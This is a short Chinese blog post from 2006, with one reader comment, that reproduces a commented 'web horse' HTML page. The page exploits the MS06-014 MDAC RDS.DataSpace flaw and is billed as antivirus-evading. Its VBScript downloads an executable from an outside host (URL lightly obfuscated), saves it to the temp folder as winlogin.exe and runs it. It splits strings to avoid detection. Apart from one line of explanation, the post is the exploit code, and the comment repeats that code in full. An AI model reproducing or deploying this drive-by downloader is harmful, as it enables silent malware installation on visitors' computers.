brent's hut

一段植入木马的html代码

< html >
 
< script  language ="VBScript" >
    
on   error   resume   next
    
' 即将下载的木马
    dl  = " ht#tp://ww#w.800vv.com/cc/cj.exe# "
    
' 创建OBJECT元素
     Set  df  =  document.createElement( " object " )
    
' 指定OBJECT为RDS.DataSpace 
         ' 该对象有一个方法名为CreateObject,
         ' helpstring("Creates a business object of the specified Progid over the specified connection")
    df.setAttribute  " classid " " clsid:BD96C556-65A3-11D#0-983A-00C04F#C29E36 "
    
'
    str = " Microsoft.XMLHTTP "
    
' RDS.DataSpace.CreateObject("Microsoft.XMLHTTP","")
     Set  x  =  df.CreateObject(str, "" )
    
' 4545
    a1 = " A#do "
    a2
= " db. "
    a3
= " Str "
    a4
= " eam "
    
' str5 = "Adodb.Stream" 分成这么多段是为了掩人耳目
    str1 = a1 & a2 & a3 & a4
    str5
= str1
    
' RDS.DataSpace.CreateObject("Ado#db.Str#eam","")
     set  S  =  df.createobject(str5, "" )
    
' 5455
    S.type  =   1
    str6
= " GET "
    
' Microsoft.XMLHTTP.Open "GET" "ht#tp://ww#w.800vv.com/cc/cj.exe#" False
         ' 下载木马
    x.Open str6, dl,  False
    x.Send
    
' 本地文件名
    fname1 = " winlogin.exe "
    
' 888
     set  F  =  df.createobject( " Scri#pting.FileSy#stemObject " , "" )
    
' 获取临时目录
     set  tmp  =  F.GetSpecialFolder( 2
    
' 创建本地文件
    fname1 =  F.BuildPath(tmp,fname1)
    
' Adodb.Stream.open
    S.open
    
' Adodb.Stream.write 木马代码
    S.write x.responseBody
    
' Adodb.Stream.savetofile "临时目录\winlogin.exe"
    S.savetofile fname1, 2
    
' 6551
    S.close
    
' 458
     set  Q  =  df.createobject( " Shell.Application " , "" )
    
' 运行 临时目录\winlogin.exe
    Q.ShellExecute fname1, "" , ""
    
' 55
    
</ script >
    
< head >
    
< title > icexiaoyeMS06-014免杀网马 </ title >
    
</ head >< body >
    
< center > icexiaoyeMS06-014免杀网马 </ center >
    
</ body >

< script  type ="text/jscript" >
function  init() 
document.write(Date());

}

window.onload 
=  init;
</ script >
</ html >
一般来说,script是无法写本地文件的。。这段代码利用了Microsoft Data Access Components (MDAC)的一个安全漏洞来写本地文件。

posted on 2006-09-25 14:18 brent 阅读(6224) 评论(1)  编辑 收藏 引用 所属分类: Windows

评论

# re: 一段植入木马的html代码 2012-06-25 14:47 往往v

< html >
< script language ="VBScript" >
on error resume next
' 即将下载的木马
dl = " ht#tp://ww#w.800vv.com/cc/cj.exe# "
' 创建OBJECT元素
Set df = document.createElement( " object " )
' 指定OBJECT为RDS.DataSpace
' 该对象有一个方法名为CreateObject,
' helpstring("Creates a business object of the specified Progid over the specified connection")
df.setAttribute " classid " , " clsid:BD96C556-65A3-11D#0-983A-00C04F#C29E36 "
'
str = " Microsoft.XMLHTTP "
' RDS.DataSpace.CreateObject("Microsoft.XMLHTTP","")
Set x = df.CreateObject(str, "" )
' 4545
a1 = " A#do "
a2 = " db. "
a3 = " Str "
a4 = " eam "
' str5 = "Adodb.Stream" 分成这么多段是为了掩人耳目
str1 = a1 & a2 & a3 & a4
str5 = str1
' RDS.DataSpace.CreateObject("Ado#db.Str#eam","")
set S = df.createobject(str5, "" )
' 5455
S.type = 1
str6 = " GET "
' Microsoft.XMLHTTP.Open "GET" "ht#tp://ww#w.800vv.com/cc/cj.exe#" False
' 下载木马
x.Open str6, dl, False
x.Send
' 本地文件名
fname1 = " winlogin.exe "
' 888
set F = df.createobject( " Scri#pting.FileSy#stemObject " , "" )
' 获取临时目录
set tmp = F.GetSpecialFolder( 2 )
' 创建本地文件
fname1 = F.BuildPath(tmp,fname1)
' Adodb.Stream.open
S.open
' Adodb.Stream.write 木马代码
S.write x.responseBody
' Adodb.Stream.savetofile "临时目录\winlogin.exe"
S.savetofile fname1, 2
' 6551
S.close
' 458
set Q = df.createobject( " Shell.Application " , "" )
' 运行 临时目录\winlogin.exe
Q.ShellExecute fname1, "" , ""
' 55
</ script >
< head >
< title > icexiaoyeMS06-014免杀网马 </ title >
</ head >< body >
< center > icexiaoyeMS06-014免杀网马 </ center >
</ body >

< script type ="text/jscript" >
function init() {
document.write(Date());

}
window.onload = init;
</ script >
</ html >  回复  更多评论   


只有注册用户登录后才能发表评论。
网站导航: 博客园   IT新闻   BlogJava   知识库   博问   管理